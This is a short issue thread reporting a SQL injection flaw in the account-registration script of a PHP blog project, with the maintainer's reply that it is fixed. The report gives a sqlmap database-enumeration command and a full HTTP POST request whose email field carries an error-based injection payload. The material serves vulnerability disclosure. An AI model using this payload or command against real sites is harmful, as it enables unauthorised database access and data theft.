### ISSUE TITLE
uyelikolustur.php Presence of sql1

### ISSUE THREAD

**Issue by 238469** [berkaygediz/O_Blog#3]
Using sqlmap to drag libraries
sqlmap  -r 1.txt --dbs
POST /O_Blog-main/uyelikolustur.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Referer: http://192.168.150.131/O_Blog-main/
Cookie: PHPSESSID=47f2e65dc21f74afcf051675a3a86426
Content-Length: 318
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.150.131
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eposta"

1323' or updatexml(1,concat(1,database()),1),123)#
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="kullaniciadi"

123
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="sifre"

123
------------YWJkMTQzNDcw--

**Comment by berkaygediz** [comment]
The vulnerability has been fixed. Update is on its way.

**Thanks for reporting the issue.**
